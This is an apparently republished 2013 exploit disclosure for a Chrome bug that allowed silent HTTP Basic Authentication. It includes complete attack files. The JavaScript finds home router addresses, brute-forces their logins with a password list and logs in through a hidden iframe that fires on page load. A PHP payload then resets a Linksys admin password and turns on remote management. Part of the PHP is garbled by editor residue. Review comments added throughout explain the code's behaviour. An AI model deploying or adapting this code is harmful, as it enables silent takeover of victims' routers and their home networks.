Google Chrome Silent HTTP Authentication
来源:vfocus.net 作者:T355 发布时间:2013-02-18  
VULNERABILITY DETAILS
The latest version of Google Chrome (Tested on Version 24.0.1312.57)
fails to properly recognize HTTP Basic Authentication when injected in
various HTML tags. As a result of this behavior Chrome will not alert
the user when HTTP Basic Authentication is taking place or when
credentials are rejected. This behavior is particularly concerning
with respect to small office and home routers. Such devices are easily
brute forced using this method. Many of these devices have the default
password enabled, which brings me to part II of this bug. Silent HTTP
Authentication allows the attacker to log into the router and change
settings with no alerts or warnings issued by Chrome. The end
result allows an attacker to brute force the router login, connect to
the router, enable remote administration and of course control all
information on the entire network via DNS attacks etc.
REPRODUCTION CASE
I have attached the following files:
 
=======================================
sploit.txt - Indicates the buggy code.
Bug 1 - (Stylesheet Method)
<link rel="stylesheet" href="http://admin:password@192.168.1.1/" type="text/css" />

Bug 2 - (IMG Method)
<img src="http://admin:password@192.168.1.1" />

Bug 3 - (iFrame Method)
var iframe = document.getElementById("loginFrame");
iframe.src = "http://admin:password@192.168.1.1";

=======================================
jquery.js - Used for the real-world scenario but not needed to trigger the bug.
jQuery v1.7.1 jquery.com 

=======================================
brute.js - Real world attack scenario for this bug.
//Settings
// NOTE(review): the whole script depends on the browser sending the user:pass@
// part of a URL for subresource loads without prompting (the behaviour described
// above); later browser versions refuse such credentials on subresource
// requests, so confirm against the version actually under test.
// `victim` is the router address; it is overwritten by enumerateRouter() once a
// host responds, so the value here is only a starting default.
victim = "192.168.1.1";
// `user` is only used by logPW() for the iframe login URL; crackPass() hard-codes
// "admin" in its href instead of reading this variable.
user = "admin";

//Dont touch these
// All of these are implicit globals (no var). `count`, `enabled` and `payload`
// are never referenced again anywhere in this listing; only `passFound` is.
count = 1;
enabled = false;
payload = false;
// 0 until logPW() fires for the first time, then 1 (see logPW()).
passFound = 0;

//Password Array
// Candidate list tried by crackPass(), in order. It contains duplicates
// ("password", "123456", "welcome", "1234"), so those are requested more than once.
pass = new Array("","admin","password","1234","netgear1","netgear","optimum","password","test","linksys","tech","123456","123456","password","123456789","welcome","ninja","abc123","qwerty","12345678","princess","sunshine","iloveyou","welcome","jesus","babygirl","12345","rockyou","Nichole","Daniel","money","monkey","freedom","654321","michael","1234567","love","master","ginger","11111","1234","dragon","batman","baseball","buster","starwars","dallas","summer","access","killer","mustang","2000","soccer","ranger","696969","tigger","pass","shadow","Jennifer","letmein","Joshua","merlin","Robert","hockey","666666","orange","jordan","trustno1","superman","computer","123123","thunder","internet","lifehack","0","gizmodo","whatever","cheese","nintendo","f You","blahblah","passwOrd","gawker","Password","pokemon","michelle","pepper","kotaku","F#ck","P#ssy","6969","1111","a##hole","golfer","austin","biteme","cowboy","silver","F#cker","bigdog","bl#wjob","yellow","131313","hello","please","scooter","dick","iwantu","sexy","panties","hammer","yankees");
// `length` caches pass.length for the loop in crackPass();
// `element` is declared here but never used in this listing.
var length = pass.length,
element = null;

// crackPass: for every entry of `pass`, appends a <link rel="stylesheet"> to <head>
// whose href embeds admin:<password>@<victim>; the link's onload attribute calls
// logPW() with that password. The passFound guard is evaluated synchronously on
// each iteration, but logPW() only runs from an onload event after this loop has
// returned, so in practice every entry is appended in one burst — from the
// router's side this is many near-simultaneous requests to "/" carrying
// different credentials, which is the observable signature of this script.
// `password` is assigned without var and is therefore a global.
function crackPass() {
	for (var i = 0; i < length; i++) {
		if(passFound == 0) {
			password = pass[i];
			jQuery('head').append('<link rel="stylesheet" onload="logPW(\'' + password + '\')" href="http://admin:' + password + '@' + victim + '" type="text/css" />');
		}
	}
}

// logPW: onload handler for the <link> elements created by crackPass(); the
// browser reporting the stylesheet as loaded is taken to mean the embedded
// credentials were accepted. On the first call it shows an alert with the
// password, points the hidden "loginFrame" iframe at the router with
// user:password@victim after 500 ms, and navigates the top window to the router
// after 2 s. Every call (first or not) sets passFound to 1, so later onload
// events are no-ops apart from that assignment.
// @param {string} password - the password embedded in the link that fired onload
function logPW(password) {
	if(passFound == 0) {
		alert("Your Router Passowrd is: " + password);
		//Log Into Router
		var iframe = document.getElementById("loginFrame");
		setTimeout(function() { iframe.src = "http://" + user + ":" + password + "@" + victim; }, 500);
		setTimeout(function() { window.location = "http://" + victim; }, 2000);
	}
	passFound = 1;
}


// dropLoad: points the hidden "loginFrame" iframe at attack.php?ip=<victim> after
// 100 ms and logs "dropping payload" to the console immediately. Nothing in this
// listing calls it — index.html only invokes enumerateRouter(), and logPW() does
// not call it — so as published it has to be triggered by something not shown.
function dropLoad(){
	var iframe = document.getElementById("loginFrame");
	setTimeout(function() {  iframe.src = "attack.php?ip=" + victim; }, 100);
	console.log("dropping payload");
}

// Candidate gateway addresses probed one at a time, in this order, by
// enumerateRouter(); `counter` is the index of the next address to try.
// Both are implicit globals.
iplist = new Array("192.168.1.1","10.0.1.1","10.0.0.1","192.168.1.220","192.168.2.1","10.1.1.1","192.168.11.1","192.168.0.1","192.168.0.30","192.168.0.50","192.168.1.30","192.168.1.50","192.168.10.1","192.168.20.1","192.168.30.1","192.168.62.1","192.168.100.1","192.168.102.1","192.168.1.254","192.168.0.227","10.0.0.138","192.168.123.254","192.168.4.1","10.0.0.2");
counter = 0;
 
// enumerateRouter: takes the next address from iplist (advancing `counter`) and
// sends it an asynchronous POST to "http://<ip>" with a JSON content-type and no
// body, 1 s timeout. A timeout is logged as "FAIL" and the function recurses to
// the next address; a request *error* is logged as "MATCH", `victim` is set to
// that address and crackPass() starts. The readystatechange handler is an empty
// stub (its alert is commented out). Returns false once the list is exhausted,
// otherwise returns undefined.
// NOTE(review): a cross-origin error is what the author treats as "host present",
// so any reachable web server on a listed address — not only a router — will be
// selected; a quiet or filtered address simply times out.
// Observable signature: a sequence of POST / requests to common gateway
// addresses, ~1 s apart, from a single browser client.
function enumerateRouter() {
   if(counter !== iplist.length){
        var ip = iplist[counter];
        counter++;
	} else {
		return false;
	}
	
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function () {
		if (xhr.readyState == 4 && xhr.status == 200) {
			//alert("success");
		}
	};

	xhr.open("POST", "http://" + ip, true);
	xhr.setRequestHeader("Content-type", "application/json; charset=utf-8");
	xhr.timeout = 1000;
	xhr.ontimeout = function () { console.log(ip + " FAIL"); enumerateRouter(); }
	xhr.onerror = function () { console.log(ip + " MATCH"); victim = ip; crackPass();  }
	xhr.send();
}

=======================================
index.html - HTML Attack Page
<!DOCTYPE html>
<html>
<head>
<!-- jquery.js is only needed for the jQuery('head').append() call in brute.js -->
<script type='text/javascript' src='jquery.js?ver=1.7.1'></script>
<script type='text/javascript' src='brute.js'></script>
</head>
<!-- enumerateRouter() from brute.js starts as soon as the page loads; no user interaction is involved -->
<body onload="enumerateRouter()">
<!-- hidden frame that logPW()/dropLoad() in brute.js point at the router; display:none keeps it out of view -->
<iframe name="loginFrame" id="loginFrame" src="about:blank" style="display:none;"></iframe>
</body>
</html>

=======================================
attack.php - Payload file for Linksys Routers.
<? 
//collect some info
// NOTE(review): the "___FCKpd___0" tokens on the following lines are HTML-editor
// residue introduced when the site published this page, not PHP; the two variable
// reads are therefore truncated as published and are left unrepaired here.
$ip = 
___FCKpd___0
GET["ip"]; $wan =
___FCKpd___0
SERVER['REMOTE_ADDR']; ?> <html> <head> </head> <body onload="sendPayload()"> <FORM id=password name=password action="http://<? echo $ip; ?>/manage.tri" method=post> <input type=hidden name=remote_mgt_https value=0> <input type=hidden name=http_enable value=1> <input type=hidden name=https_enable value=0> <input type=hidden name=PasswdModify value=0> <input type=hidden name=http_passwd value=d6nw5v1x2pc7st9m> <input type=hidden name=http_passwdConfirm value=d6nw5v1x2pc7st9m> <input type=hidden name=_http_enable value=1> <input type=hidden name=web_wl_filter value=1> <input type=hidden name=remote_management value=1> <input type=hidden name=http_wanport value=5555> <input type=hidden name=upnp_enable value=1> <input type=hidden name=layout value=en> <input type="submit" value="submit"> </FORM> <script> function sendPayload(){ document.password.submit(); } </script> </body> </html>

 